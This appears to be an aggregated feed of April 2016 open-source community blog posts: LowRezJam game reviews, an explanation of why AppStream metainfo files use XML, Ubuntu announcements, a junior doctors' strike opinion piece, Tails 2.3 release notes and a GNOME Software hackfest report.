    r

    Ouch, the ponderous music is quite painful to endure.


    Kulten

    Great graphics — the text is a little hard to read at times, especially distinguishing D and O, or similar — but the feel of the game is marvellous. It really misses sound!


    micro-society

    Interesting concept, although the 64px limitation maybe makes the representation a bit too abstract! Having new children get born just by walking into other players feels a bit weird, too. But there are some quite complex game mechanics underlying this!


    Star Shield

    Obviously simple graphics, but easy to play. The white UFOs are terribly hard to kill! I’m not sure what “shield” does; it certainly doesn’t stop you being killed by bullets or collisions :-)


    Castle Storm

    Really nicely put together; a complete and well-implemented fun game. The font is, as noted, a little hard to read, and it’s sometimes hard to know why you’re not allowed to buy a thing — is it because you haven’t bought one of the pre-requisites, or because you don’t have enough money, or because you’ve bought it already — and that does break the immersion somewhat. Watching a Lord attacking the enemy castle is highly amusing. Nice work!


    Fast Escape LowRez

    Maze gameplay boiled down to its simplest possible form. :) Agreed with bonus1up that some framing device and music and sounds would help it feel more like a game rather than a demo of the technique. The maze generator seems to generate some pretty tangled messes at times, and I roamed pretty aimlessly until I discovered the green exit block. A score or some method of assessing progress would be nice, perhaps.


    Gummy Turbo Tunnel

    I see the idea, but I assume that the deadline landed before gameplay could be added. Nice start on an idea, though!


    FRST FIRE

    Sadly, the game crashed with an error (screenshot at imgur) when I tried to increase the growth rate; I think I may have pressed “right” and Z at the same time. I love the concept; it would be nice to see a version of this which wasn’t constrained to 64x64 and the Pico, as an art piece and less clunky to fiddle with the parameters!


    Dungeon Shifter

    Interesting concept, and the graphics are nice (blocky, but nice). I don’t think I understood what most of the “control panel” is actually for, though, and needing to control that by clicking while simultaneously either clicking arrows or using the arrow keys to go up and down means that the challenge is not “playing the game” but “managing the controls”, which I don’t think is meant to be the challenging part :)


    64s Resistance

    I don’t think I understand what the score is actually scoring, here. Button-mashing, once I started being “attacked” from all sides, got me up to 70 or so, but I didn’t really have much of an idea what I was doing, and then my score reset to 0 and I didn’t know what I’d done wrong. It feels like there might be a good idea in here for twitch gameplayers and people who like Super Hexagon, but I think more feedback as to what’s going on and why is needed.


    LZRS

    The try-and-die-iest of try-and-die games :) Fun! The controls feel a little bit wonky; sometimes I wouldn’t be able to jump and it wasn’t clear why. Fun, though, and I won after only forty (!) deaths.


    Ghost

    Seems fun — it’s a tiny 64x64 Gunpoint, sorta! Really short, though; maybe more levels would be good.


    Duck Quest

    As you say, an in-progress demo rather than a complete game, but what’s there is pretty good. I like the single-colour palette; I can imagine this being a working game (once completed) on something like a watch or a single-use handheld game.


    Marble Incline Redux

    I don’t think the text display fits the 64px grid, does it? Also, it would be useful if continuing to the next level and starting that level were controlled with a keypress you’re already using, such as up arrow, as well as restarting after death, rather than having to wait or press R.


    Wall Defender

    Simple, and basic graphics, but easy to play and understand, and the two offset guns provide a modicum of strategy when trying to shoot two different attackers at once. I won first time out, so the difficulty curve probably needs a bit of tweaking :)


    The Forest

    Smooth movement, and I like that running into a shadow is not an instakill. Attempting to find the key is very frustrating!


    In’Out

    Elegantly done graphics. I didn’t realise for quite some time that you can jump :) Sound effects would be good to go along with the music, perhaps?


    Hyper Racing

    The car handles excellently — the first level is so easy to pass that I was already thinking of recommending more realistic movement (rather than being able to turn instantly), and then the second level (which is just the same idea, with a larger oval) is much much harder to pass in the time! So I think the difficulty curve is just about right, and the graphics are good; nice work!


    Memoblox

    The skull and its laugh makes me laugh in turn. I didn’t really realise that I was supposed to be remembering the colours until after the first playthrough; maybe some minimal instructions, or a slide saying “REMEMBER” before the colours start?


    Postal Panic

    Oh goodness me the voice commentary is so annoying. My game went out of its way to mock failure and have annoying voices and it’s not a patch on this; I kept missing parcels because I wanted to punch the screen. Excellently done. Also, nice graphics, good sound work, and slick; a complete game. Only a weakling such as myself would rate it down because it’s just too hard :)


    Monty Norman’s James Bond Theme

    I didn’t realise that I was meant to shoot without being able to see Bond! Once I worked that out, and that the “gunsight” was actually moving even though it doesn’t appear to be because the background is all white, I was able to shoot at and hit 007. I like the music loudness approach (reminiscent of Find the Invisible Cow).


    Sk8Skull

    A good start; nice pixel art. The game obviously needs work, as you know; as far as I can tell it’s not possible to jump over two sets of spikes next to one another. You’ll also not want to make the “restart the game” keypress also count as a “jump” keypress. But this could grow to be something good with more work!


    Terracell

    I suspect this is a demo that never got finished? The graphics are surprisingly impressive — I particularly liked the realism of the rain — but there doesn’t seem to be a purpose to the game (nor any sound), and walking through an elephant means that the elephant sticks right with you and flickers on and off, weirdly. Could be the nucleus of something impressive with lots more development, though; a good start.


    The Sheriff

    Sadly, the game doesn’t cancel keypresses when they’re not used, which means that every time I’m walking downwards and I walk into something, the down arrow is ignored by the game and passes on to the web page and the page scrolls downwards, taking the game out of vision! This made it really hard to play, I’m afraid! Opening the frame in its own tab helps, though.


    BuggyBall

    Nice art, and the car is surprisingly controllable. The low resolution meant that I didn’t realise for quite a while that my car could be turned upside down and that’s why I couldn’t drive anywhere, though, and if you leave the AI alone for three seconds it scores a goal :-)


    Useless Clicker

    Impeccably implemented simple joke. It gets a smirk, which I’m sure is all its little heart desires :)


    Mogee

    I think I got trapped in a corner and couldn’t get out, even after I died and the game restarted. Simple mechanic, and it’d benefit from some sound, but playable!


    Cat Herder 9000

    The cats slide around not on the 64x64 grid, which makes them look smooth but breaks the rules :) As noted, there’s not much of a sense of agency here; I don’t feel like I have much control over the cats (arguably, because they’re cats), but that does mean that the game feels like making a succession of random moves until you win by accident, rather than by superior play. I can’t see how anyone could become an expert at this game rather than merely winning by luck…


    Circle Pong

    Quite a clever mechanic — that I get confused when I’m atop the circle and the “left” button is actually going to the right is not the game’s fault :) It’s very easy to overshoot or undershoot, though, which is frustrating; it might be nice if this were made less punishing, although maybe the idea of having to get it dead on right is a deliberate part of gameplay!


    Intents: Man to Man (v1.01a)

    The description calls this “weird”, which I don’t think is fair, but it is detailed. As noted, paying attention to the manual is pretty important to work out what’s going on. Choosing the squares to move to feels unusually clumsy, by comparison with the rest of the UI which actually flows pretty well once you’ve got the hang of what you’re doing. This feels like the video equivalent of what “proper” wargames (measure the hexes, spend time with books of tables calculating precise angles and damage for mortars, etc) are to Risk, and there’s definitely an audience for that.

    (also, as @phantomax says… it’s not meant to be called “intense”, is it? :))


    Cat’s Trophy!

    Cute but rather bare graphics. The game’s actually surprisingly hard. Instadeath for going off screen seems a bit harsh, rather than just locking the player to the screen.


    Dexno

    I found it useful to apply a changed style to the canvas in the game: canvas { height: 60vh; } makes it much bigger and easier to see, which may help with the issue you were having with the HTML viewport.


    SQUARE SQUARE

    Interesting idea. It’s really, really difficult though; maybe start slower and speed up over time? Otherwise it leads less to attempts to do better and more to just table-flipping annoyance and a move on to another game :)


    Mini Prix

    Ninth out of nine, but this was good fun!


    Zerwol the Wizard

    I don’t have any very clear idea of what I’m meant to do — just wander around and kill everything?


    FusionSpace

    The music kept making me think it was going to be the Game of Thrones theme :)


    Of A Forgotten Earth

    Hard to see what’s going on when most of the screen is obscured (although maybe that’s the point). The cutscene at the beginning is interesting the first time through the game but has to be manually skipped through every time you die, which is rather frustrating.


    Air War 64x64

    Looks really good! but it’s sometimes hard to see exactly where the Red Baron is when he’s just three or four red pixels :) Also, it’s a little hard to tell whether I won or lost when we end up flying directly at one another firing. (Perhaps it’s just that I’ve never won and so I’ve never seen a win screen!)


    Cave 64

    Basic graphics, but has potential to be developed into something!


    Battle Box (LowRezJam)

    I’m not sure I wholly understand what I’m doing, here. I can roll around, shoot white blocks (which moves them), and shoot the enemy (which moves them but doesn’t kill them, to my surprise), but… then what? I like the conceit of the rolling cube which fires in a particular direction, much like a bunch of single-player puzzles of this kind. The time limit on a move makes it all feel rather rushed, which is a little unfortunate because it makes the game feel like a very low rez arena deathmatch, rather than like a carefully thought-out chess game.


    Endless Burger

    I wish there were some sound in this. That the merest touch of a burger bap on my mostly-complete burger counts as instadeath means that I end up playing the game by merely fleeing from burger tops like a gluten-free lunatic with a flour phobia, but that’s perhaps part of the skill of the game.But without sound, it feels half-finished. This wouldn’t take much to be turned into a really challenging game, I think!


    GhostShi

    Sadly, the “up” and “down” abilities didn’t seem to work for me, so all I could seem to do is walk off the edge into the first water pool and die. Maybe there’s something I missed, but a little tutorial level might have helped if there’s an action I didn’t know to do. Nice graphics and feel.


    Total Devotion

    This is alarmingly creepy. It also shamelessly violates the 64x64 pixel grid :)


    Forms II : Hero Of the Office

    An interesting concept. After the first day, the screen went red and I didn’t seem to be able to do anything else, sadly. I like the graphical approach and the idea behind it, though!


    Gravimine

    Took me some time to realise that collisions with (a) the rocks you’re trying to mine and (b) the bottom of the tractor beam (?) are fatal and I’m supposed to avoid that. Once I’d got it, there is potential here; it’s Thrust, but with the added attraction that the rock follows you around and you mustn’t collide with it. Obviously it’s just a prototype and therefore doesn’t have music or backstory or anything, but I think this could be quite entertaining once it becomes a game!


    Big Sword

    Nice feel, especially the squelch on hitting something. It does lend itself a bit to button mashing, but that’s part of the old-school fun :)


    babelburger

    I don’t think I’d eat a burger which had a burger bun, a slice of lettuce, another slice of lettuce, and two more burger buns. Might be a bit bland :) That aside, the game takes real advantage of its low resolution and is rather fun! The logo’s delightful, too. It’s a little hard in initial play, perhaps; softening the difficulty curve just a tiny bit might be useful, so people can get beyond about two burgers without having to be the Flash. I suspect this might be easier with a touchscreen…


    Bring Your Wedge

    Yay! 64 points! I still don’t think I’ve quite grasped what the perfect tempo is, but I like the game a lot; quite a compelling challenge, and getting a hole in one is lovely :)


    Snakoban

    Surprisingly difficult for such a simple game mechanic! It would be worth cancelling the keypresses after you’ve trapped them, so that up/down arrows don’t navigate up and down the page.


    Looping Zip

    Simple gameplay and easy to grasp, but rather hard to master! It may be worth prohibiting space bar presses from changing direction if they’re pressed after the game has “started” but before the ship has actually started moving, because a few times I hit space to start when I thought my previous press hadn’t been registered, only to discover that it had been registered but the ship is slow to get started.


    QWER

    Needs, I think, a little tutorial bit or similar to explain the mechanics? I managed to have two of my shapes completely disappear but I don’t know whether that was a good thing or a bad…


    A Leader

    Hard to work out what to do to pick up people and avoid losing them; it feels like this might be a good twitch game, or a good puzzle game, but trying to solve the puzzle of how to bypass each impediment and pick up each person while also trying to manage the twitch element of doing it all at the right time is overwhelming my poor brain…


    Lament

    The controls are… a bit difficult to get one’s head around, but once mastered they’re OK. That you can’t stop on a wall (you can either climb or slide, but not stay still) is a touch weird, but getting to grips with that is the required skill, perhaps. The music is a cool track but maybe a bit overdramatic for the actual gameplay. This is the kernel of a good idea, I think; could be good with work.


    1985

    Nicely done. Feels very old-school, in a good way; I can absolutely imagine this being a released game back in the day.


    bitbout

    Was driven nuts by the lack of friction on the platforms, at which I’m sure the author was cackling and rubbing their hands in glee because that’s the point. Having a computer enemy would be good for practice, although I fell off enough all by myself…


    PRTs

    Delightful graphics; the limited palette really helps! Sailing around does feel a bit aimless, especially since I don’t seem to be able to re-visit an island where I died (does it sink back into the sea when the crabs make a kill or something?). Once I’d worked out that the combat relied on me hitting the arrow keys in time with those on screen rather than just as fast as possible, I never lost another battle, so that was nice :)


    Dual Wielded

    Flinging myself around by firing guns is interesting; reminds me of the XKCD What If article about flying by building a platform of AK-47s! Nice low-res graphics, too, and choice of protagonist.


    H4LF L1F3

    Nice effects on the title screen. Game seems smooth but occasionally the framerate drops. I killed a monster but then wasn’t sure what to do; shooting the “cells” seems to make them react, but they don’t die, and shooting the big “cell” in the middle makes the screen flash and we get a “gasp!” sound effect but that doesn’t die either.


    The Legend of Fangury

    Classic, indeed, but well implemented. I particularly appreciate that inadvertently touching an enemy is not instadeath! I do occasionally find myself leaping a bit into the unknown because it’s hard to see what’s coming up, but perhaps that’s a feature rather than a bug.


    Swarm

    I think this is hurt by the 64x64 limitation; it feels like I’m frantically moving my tiny letterbox around the map searching for a flower under attack as pointed to by the indicators. Of course, that’s part of the game, but it’s probably a bit far over the frustrating-vs-fun line for me. I also spent almost the whole first playthrough thinking that the little darker green “grass” things were flowers and failing to understand why nothing worked :) The swarming effect is really nice!


    OR-BIT

    Avoiding things is really, really hard. Not, like, “I must get expertise” hard, but “solid wall of unavoidable rocks” hard. I like the slightly drifty slow uncontrollable nature of the astronaut, which fits with the low-gravity backstory, but combining that with the sheer volume of rocks makes survival pretty much impossible…


    Potion Guesser

    It’s very hard to know which ingredient is currently selected, and it’s possible to select the “right arrow” even when you’re at the end of the list, meaning that I spent half the time baffled that mouse clicks weren’t doing anything. Other than that, the UI seems quite smooth and nice. The game’s a lot harder because you can’t use the same ingredient twice! I expected the “troll’s eye” to do something special because I was especially given it in the opening cutscene, but maybe that’s just misinterpretation.


    Pixel Eater

    Obviously very minimal in graphics (and no sound at all), but the idea is reasonable. Interestingly, I expected red berries to be an instakill and was pleased to see that they drop you a size category instead. The game is very easy, though; I won on the second and all subsequent tries :-)


    BNOD

    Agreed with other comments; I don’t get the rules. I don’t see what FRIENDS? or SPACE actually mean. Possibly the whole game is to work that out, but the hurdle makes me turn away rather than puzzle to figure it out :(


    Oort

    (no sound, though?) Obviously unfinished, as mentioned in the description. That said, I like that the jumps are absurdly high by comparison with other platforms (and in addition to this absurdly high jump we have a double jump which is doubly absurdly high); it changse the way I think about the game a surprising amount for such a nominally small change. Being followed about by the nasty things with red eyes and being unable to shake them off is also an interesting mechanic, and I like their hammers. As noted, the space-to-“attack” thing doesn’t actually do anything other than draw a dotted circle around me and freeze the game, so i suspect that’s not yet implemented. But there’s the core of a good thing here; interesting graphics, interesting divergence from standard platforming rules with the high jump, and I’d like to see more.

    And the game I thought was best…

    Slumber Knight

    Great fun game; graphics are well done, sound matched, good feel to the game. Nice one! Full marks.

    I really liked Slumber Knight. Delightful graphics and feel. I confessed to the developer on Twitter that I ended up hacking the game a bit so I could see how it ended, by making myself immune to collisions, but that’s not a bad thing about the game, it’s a bad thing about my impatience. It’s excellent work.

    And… what I did

    I did, of course, enter a game myself. It’s called “Have You Seen This Image?“, and you can play it. It was deliberately simple — I didn’t want to devote much time to writing it — but I really enjoyed the experience of building a complete game, releasing it, and seeing people rate it. A pretty common theme in the comments was that it doesn’t _quite_ explain exactly what you need to do, but I think everybody gets it after one playthrough, and playthroughs are very quick indeed. (I put some effort into making sure that you can start again without having to wait as soon as you die.) The juxtaposition of the abusive failure messages with the marvellously jaunty music still makes me laugh every time I play it. (The music is Pixelland from the incomparable Kevin MacLeod.) Images were from Wikipedia; after some help from the #wikimedia-tech IRC channel, I discovered Quarry which allows you to run arbitrary SQL queries against the Wikimedia databases from inside the browser, and is a very excellent thing indeed. So I wrote a query to return all 64x64 images from Wikimedia Commons and then picked a bunch of them. In order to make the game more difficult, I then made three copies of each image, tinted blue, red, and green respectively, so you’d see images that you might have seen before but in different colours. And that was that. There’s a bug in there somewhere which causes two success sounds to play at once (so you get the game saying “Awesome!” _and_ “Fantastic!” when you get it right sometimes), but after trying and failing to work out why, I’ve reclassified it as a feature because it amuses me to hear the sounds anyway. So, conclusion: writing a game is fun; hanging out with the game jam community is fun; thank you to popey for nudging me into doing it; and I came 72nd for game feel, which I am perfectly happy with. Must do this again at some point.

    26 April, 2016 05:12PM

    hackergotchi for Tanglu developers

    Tanglu developers

    Why are AppStream metainfo files XML data?

    This is a question raised quite quite often, the last time in a blogpost by Thomas, so I thought it is a good idea to give a slightly longer explanation (and also create an article to link to…).

    There are basically three reasons for using XML as the default format for metainfo files:

    1. XML is easily forward/backward compatible, while YAML is not

    This is a matter of extending the AppStream metainfo files with new entries, or adapt existing entries to new needs.

    Take this example XML line for defining an icon for an application:

    <icon type="cached">foobar.png</icon>

    and now the equivalent YAML:

    Icons:
      cached: foobar.png

    Now consider we want to add a width and height property to the icons, because we started to allow more than one icon size. Easy for the XML:

    <icon type="cached" width="128" height="128">foobar.png</icon>

    This line of XML can be read correctly by both old parsers, which will just see the icon as before without reading the size information, and new parsers, which can make use of the additional information if they want. The change is both forward and backward compatible.

    This looks differently with the YAML file. The “foobar.png” is a string-type, and parsers will expect a string as value for the cached key, while we would need a dictionary there to include the additional width/height information:

    Icons:
      cached: name: foobar.png
              width: 128
              height: 128

    The change shown above will break existing parsers though. Of course, we could add a cached2 key, but that would require people to write two entries, to keep compatibility with older parsers:

    Icons:
      cached: foobar.png
      cached2: name: foobar.png
              width: 128
              height: 128

    Less than ideal.

    While there are ways to break compatibility in XML documents too, as well as ways to design YAML documents in a way which minimizes the risk of breaking compatibility later, keeping the format future-proof is far easier with XML compared to YAML (and sometimes simply not possible with YAML documents). This makes XML a good choice for this usecase, since we can not do transitions with thousands of independent upstream projects easily, and need to care about backwards compatibility.

    2. Translating YAML is not much fun

    A property of AppStream metainfo files is that they can be easily translated into multiple languages. For that, tools like intltool and itstool exist to aid with translating XML using Gettext files. This can be done at project build-time, keeping a clean, minimal XML file, or before, storing the translated strings directly in the XML document. Generally, YAML files can be translated too. Take the following example (shamelessly copied from Dolphin):

    <summary>File Manager</summary>
    <summary xml:lang="bs">Upravitelj datoteka</summary>
    <summary xml:lang="cs">Správce souborů</summary>
    <summary xml:lang="da">Filhåndtering</summary>

    This would become something like this in YAML:

    Summary:
      C: File Manager
      bs: Upravitelj datoteka
      cs: Správce souborů
      da: Filhåndtering

    Looks manageable, right? Now, AppStream also covers long descriptions, where individual paragraphs can be translated by the translators. This looks like this in XML:

    <description>
      <p>Dolphin is a lightweight file manager. It has been designed with ease of use and simplicity in mind, while still allowing flexibility and customisation. This means that you can do your file management exactly the way you want to do it.</p>
      <p xml:lang="de">Dolphin ist ein schlankes Programm zur Dateiverwaltung. Es wurde mit dem Ziel entwickelt, einfach in der Anwendung, dabei aber auch flexibel und anpassungsfähig zu sein. Sie können daher Ihre Dateiverwaltungsaufgaben genau nach Ihren Bedürfnissen ausführen.</p>
      <p>Features:</p>
      <p xml:lang="de">Funktionen:</p>
      <p xml:lang="es">Características:</p>
      <ul>
        <li>Navigation (or breadcrumb) bar for URLs, allowing you to quickly navigate through the hierarchy of files and folders.</li>
        <li xml:lang="de">Navigationsleiste für Adressen (auch editierbar), mit der Sie schnell durch die Hierarchie der Dateien und Ordner navigieren können.</li>
        <li xml:lang="es">barra de navegación (o de ruta completa) para URL que permite navegar rápidamente a través de la jerarquía de archivos y carpetas.</li>
        <li>Supports several different kinds of view styles and properties and allows you to configure the view exactly how you want it.</li>
        ....
      </ul>
    </description>

    Now, how would you represent this in YAML? Since we need to preserve the paragraph and enumeration markup somehow, and creating a large chain of YAML dictionaries is not really a sane option, the only choices would be:

    • Embed the HTML markup in the file, and risk non-careful translators breaking the markup by e.g. not closing tags.
    • Use Markdown, and risk people not writing the markup correctly when translating a really long string in Gettext.

    In both cases, we would loose the ability to translate individual paragraphs, which also means that as soon as the developer changes the original text in YAML, translators would need to translate the whole bunch again, which is inconvenient.

    On top of that, there are no tools to translate YAML properly that I am aware of, so we would need to write those too.

    3. Allowing XML and YAML makes a confusing story and adds complexity

    While adding YAML as a format would not be too hard, given that we already support it for DEP-11 distro metadata (Debian uses this), it would make the business of creating metainfo files more confusing. At time, we have a clear story: Write the XML, store it in /usr/share/metainfo, use standard tools to translate the translatable entries. Adding YAML to the mix adds an additional choice that needs to be supported for eternity and also has the problems mentioned above.

    I wanted to add YAML as format for AppStream, and we discussed this at the hackfest as well, but in the end I think it isn’t worth the pain of supporting it for upstream projects (remember, someone needs to maintain the parsers and specification too and keep XML and YAML in sync and updated). Don’t get me wrong, I love YAML, but for translated metadata which needs a guarantee on format stability it is not the ideal choice.

    So yeah, XML isn’t fun to write by hand. But for this case, XML is a good choice.

    26 April, 2016 04:20PM by Matthias

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: Samsung Developer Conference 2016

    sdc2016_full_logo

    It’s arrived! Samsung’s big yearly developer event kicks off from April 27th – 28th in SF. A place where developers, creators and builders alike come together to discuss the latest technologies and future innovations.

    This year, IOT will be one of the big focuses, especially around smart home and ARTIK – their new chipset for IOT. We’ll be there presenting via our developer evangelist – Didier – who’ll be showcasing a demo, plus a mention by ARTIK’s head of division within his talk.

    Our demo will be an app enabled home gateway on which we can deploy several applications. We’ll show you how your smart home could interact with a home robot to serve you. The robot will use the camera you have in the house to recognise that you’ve arrived, then use a microphone in the house to take orders from you (!)

    There are also other apps that can be deployed on the home gateway too, including an access point (home wifi), video service, local communication server (imagine a Skype or google hangout where data stays in your home), home automation etc. to name a few.

    In the build-up to the event we’ve written a few pre-event blogs on their website, including this one here!

    26 April, 2016 03:45PM

    Oli Warner: Our doctors are striking for patients, not money

    My better half is a junior doctor. She works insanely long hours and cares completely for her patients. When you can see how much it costs somebody as conscientious as she is to walk out on strike, it's all the more frustrating that press coverage so spotty, confusing and often insulting.

    The underlying issue is so simple: There aren't enough doctors.

    Ignore everything you've been told. The situation in the NHS is simple to explain:

    • Doctors are a finite resource. We have 55,000 doctors in training in the NHS in England.
    • These 55,000 only barely cover existing shifts for full service regular 9-5ish Monday to Friday and emergency care 24/7. In many smaller hospitals there are already dangerous rota gaps from understaffing, but they just scrape by.

    The contract being imposed in August —the one doctors are striking against— was designed to make it affordable and legally possible for hospitals to spread these 55,000 doctors from 5 days full service, to 7 days full service.

    You can't safely do 7 days work with 5 days people.

    The Government's maths to make this "work": you take some doctors from midweek and move them to the weekend. That's what this contract allows, one way or the other. Fewer doctors in the week, and dangerously long shifts to cover the existing workload with fewer concurrent staff.

    And that isn't safe. The level of cover in some places is already dangerous. You can't spread doctors any thinner and expect anything but a diminished service. The NHS needs more doctors, not the same number spread over more days. And that's the only thing you need to consider when you're wondering why doctors are striking and whose fault that is.


    That's not to say that there aren't also other issues here. There are and they are significant but all of that can be boiled into the same argument. The NHS is already haemorrhaging doctors to countries with better working conditions and the cost to become a doctor here is huge. While we need the number of 55,000 junior doctors to grow substantially, everything about this contract and the treatment of existing doctors up to now will mean it likely shrinks away.

    I don't want to conflate the issue. Your doctors aren't striking over a 30% pay cut or additional weekends they'll be pulled in for, they're striking because they're being told that starting August they will be doing unsafe amount of work with a unsafe number of doctors. The rest is just distracting gravy.

    This contract is dangerous to patients, present and future. It must be resisted.

    26 April, 2016 03:18PM

    Forums Council: Forum Staff Additions

    A healthy team is able to renew itself and integrate new members. It is always a refreshing and exciting process, to look for new people to add to a team.

    The following Ubuntu Forums users have accepted to be part of the Staff team, which now consists of 21 Moderators, 3 Super-Moderators and 5 Admins. In addition, 4 forums users have Moderator status in a specific sub-forum (UWN, Catalan and Argentina LoCo teams forums we host). You can find a complete list of the forums leaders here.

    The new Forums Moderators are :

    Congratulations from the Ubuntu Forums Council.


    26 April, 2016 03:02PM

    Rhonda D'Vine: Prince

    Last week we lost another great musician, song writer, artist. It's painful to realise that more and more of the people you grew up with aren't there anymore. We lost Prince, TAFKAP, Symbol, Prince. He wrote a lot of great music, even some you wouldn't attribute to him, like Sinead O'Connor's Nothing Compares To You, Bangles' Manic Monday or Chaka Khan's I Feel For You. But I actually would like to share some songs that are also performed by himself, so without further ado here are the songs:

    Rest in peace, Prince. And you, enjoy.

    /music | permanent link | Comments: 0 | Flattr this

    26 April, 2016 12:32PM

    Canonical Design Team: Ubuntu orange update

    Recently, you may have seen our new colour palette update in the SDK. One notable change is the new hex code we’ve assigned to Ubuntu Orange for screen use. The new colour is #E95420.

    We have a post coming soon that will delve deeper into our new palette but for now we just wanted to make sure this change is reflected on our website while at the same time touching on it through our blog. Our Suru visual language has evolved to have a lighter feel and we’ve adjusted the hex value in order to fit in with the palette as a whole.

    We’ve updated our brand colour guidelines to take into account this change as well. You can find the new hex as well as all the tints of this colour that we recommend using in your design work.

    26 April, 2016 11:27AM

    hackergotchi for Tails

    Tails

    Tails 2.3 is out

    This release fixes many security issues and users should upgrade as soon as possible.

    Changes

    Upgrades and changes

    • You can now copy and paste your GnuPG passphrases into the pinentry dialog, for example from KeePassX or the clipboard.

    • Upgrade Tor Browser to 5.5.5.

    • Upgrade I2P to 0.9.25.

    • Upgrade Electrum from 2.5.4 to 2.6.3.

    Fixed problems

    • Clarify that users migrating from Claws Mail to Icedove should delete all their Claws Mail data to remove the warning when starting Icedove. (#11187)

    • Make both panes of Onion Circuits scrollable to fix display issues on smaller screens. (#11192)

    For more details, read our changelog.

    Known issues

    None specific to this release.

    See the list of long-standing issues.

    Get Tails 2.3

    What's coming up?

    Tails 2.4 is scheduled for June 7.

    Have a look at our roadmap to see where we are heading to.

    We need your help and there are many ways to contribute to Tails (donating is only one of them). Come ?talk to us!

    26 April, 2016 10:34AM

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: The most powerful Ubuntu phone is available to buy

    MeizuPro5_Leaning-Group-2

    We’re excited to announce that the most powerful Ubuntu phone, Meizu PRO 5 Ubuntu edition, is available to order here from en.jd.com, retailing at USD$369.99. And for our friends based in Russia, the phone can be ordered here.

    The Meizu PRO 5 Ubuntu Edition features superior high spec hardware and ships with the latest Ubuntu OTA 10 OS, making content centric Scope experience on this Ubuntu device smoother than ever.

    Here are a few key specs:

    • 5.7inch 1080p screen
    • 21.16 megapixel rear-facing camera
    • 32GB of internal memory

     

    For those of you who have pre-ordered the Meizu PRO 5 Ubuntu Edition, here’s your chance to buy!

    Buy Here

    26 April, 2016 09:55AM

    Ubuntu Insights: Flying mobile base stations are coming to the UK

    limesdr-splash_png_project-main

    EE, the largest mobile operator in the UK and now part of BT, just announced a collaboration with Lime Micro, a leader in the next big phase of open source mobile network technology, and Canonical (Ubuntu) to ensure the UK gets better mobile coverage.

    EE is heavily investing in getting to 95% geographical 4G coverage by 2020. But building a big new macro tower isn’t always possible or right. They would like to use existing infrastructure like lighthouses, high-buildings, mountains, and so on. Another major problem is the coverage for remote areas which are not economically or technically viable with the current approach. This is why EE is partnering with innovators for cheaper, smaller, more resilient and better solutions.

    Lime Micro is about to crowdfund the first app-enabled open source software defined radio, the LimeSDR. Via a 4G app, the LimeSDR will form the basis of a fully fledged base station. Attach this base station to a balloon or a drone and you will be able to cover regions that are difficult to reach otherwise. Embed base stations inside equipment that are installed for other reasons like vending machines, cash points, smart light poles, digital signage, to name a few, and the cost of rolling out connectivity will also go down.

    EE expects remote communities to participate as well. These communities can have a say in the features they require and even  participate in maintaining the network. This could bring communities to work with the operators in new ways and even reduce the need for trained technicians to travel long distances when you have the support of the local people – if a base station just needs rebooting, it’s not economical (or sensible) to send an engineer 300 miles from Edinburgh out to the islands.

    EE will be challenging UK universities to come up with even more innovative and open source ideas on how to connect the unconnected regions and drive down operating costs. Anybody with good ideas can participate. Snappy Ubuntu Core is open source, app-enabled and production ready. Just get yourself a LimeSDR, download Ubuntu Core and show the world how your app or device can lower the cost of running a network. Covering unconnected regions will bring economic progress so your work will benefit society. We love to see how you will improve the future of wireless networks…

    LimeSDR Crowd Supply video campaign.

    26 April, 2016 09:42AM

    hackergotchi for Tanglu developers

    Tanglu developers

    A GNOME Software Hackfest report

    Two weeks ago was the GNOME Software hackfest in London, and I’ve been there! And I just now found the time to blog about it, but better do it late than never 😉 .

    Arriving in London and finding the Red Hat offices

    After being stuck in trains for the weekend, but fortunately arriving at the airport in time, I finally made it to London with quite some delay due to the slow bus transfer from Stansted Airport. After finding the hotel, the next issue was to get food and a place which accepted my credit card, which was surprisingly hard – in defence of London I must say though, that it was a Sunday, 7 p.m. and my card is somewhat special (in Canada, it managed to crash some card readers, so they needed a hard-reset). While searching for food, I also found the Red Hat offices where the hackfest was starting the next day by accident. My hotel, the office and the tower bridge were really close, which was awesome! I have been to London in 2008 the last time, and only for a day, so being that close to the city center was great. The hackfest didn’t leave any time to visit the city much, but by being close to the center, one could hardly avoid the “London experience” 😉 .

    Cool people working on great stuff

    towerbridge2016That’s basically the summary for the hackfest 😉 . It was awesome to meet with Richard Hughes again, since we haven’t seen each other in person since 2011, but work on lots of stuff together. This was especially important, since we managed to solve quite some disagreements we had over stuff – Richard even almost managed to make me give in to adding <kudos/> to the AppStream spec, something which I was pretty against supporting (it didn’t make it yet, but I am no longer against the idea of having that – the remaining issues are solvable).

    Meeting Iain Lane again (after FOSDEM) was also very nice, and also seeing other people I’ve only worked with over IRC or bug reports (e.g. William, Kalev, …) was great. Also lots of “new” people were there, like guys from Endless, who build their low-budget computer for developing/emerging countries on top of GNOME and Linux technologies. It’s pretty cool stuff they do, you should check out their website! (they also build their distribution on top of Debian, which is even more awesome, and something I didn’t know before (because many Endless people I met before were associated with GNOME or Fedora, I kind of implicitly assumed the system was based on Fedora 😛 )).

    The incarnation of GNOME Software used by endless looks pretty different from what the normal GNOME user sees, since it’s adjusted for a different audience and input method. But it looks great, and is a good example for how versatile GS already is! And for upstream GNOME, we’ve seen some pretty great mockups done by Endless too – I hope those will make it into production somehow.

    Ironically, a "snapstore" was close to the office ;-)

    Ironically, a “snapstore” was close to the office ;-)

    XdgApp and sandboxing of apps was also a big topic, aside from Ubuntu and Endless integration. Fortunately, Alexander Larsson was also there to answer all the sandboxing and XdgApp-questions.

    I used the time to follow up on a conversation with Alexander we started at FOSDEM this year, about the Limba vs. XdgApp bundling issue. While we are in-line on the sandboxing approach, the way how software is distributed is implemented differently in Limba and XdgApp, and it is bad to have too many bundling systems around (doesn’t make for a good story where we can just tell developers “ship as this bundling format, and it will be supported everywhere”). Talking with Alex about this was very nice, and I think there is a way out of the too-many-solutions dilemma, at least for Limba and XdgApp – I will blog about that separately soon.

    On the Ubuntu side, a lot of bugs and issues were squashed and changes upstreamed to GNOME, and people were generally doing their best to reduce Richard’s bus-factor on the project a little 😉 .

    I mainly worked on AppStream issues, finishing up the last pieces of appstream-generator and running it against some sample package sets (and later that week against the whole Debian archive). I also started to implement support for showing AppStream issues in the Debian PTS (this work is not finished yet). I also managed to solve a few bugs in the old DEP-11 generator and prepare another release for Ubuntu.

    We also enjoyed some good Japanese food, and some incredibly great, but also suddenly very expensive Indian food (but that’s a different story 😉 ).

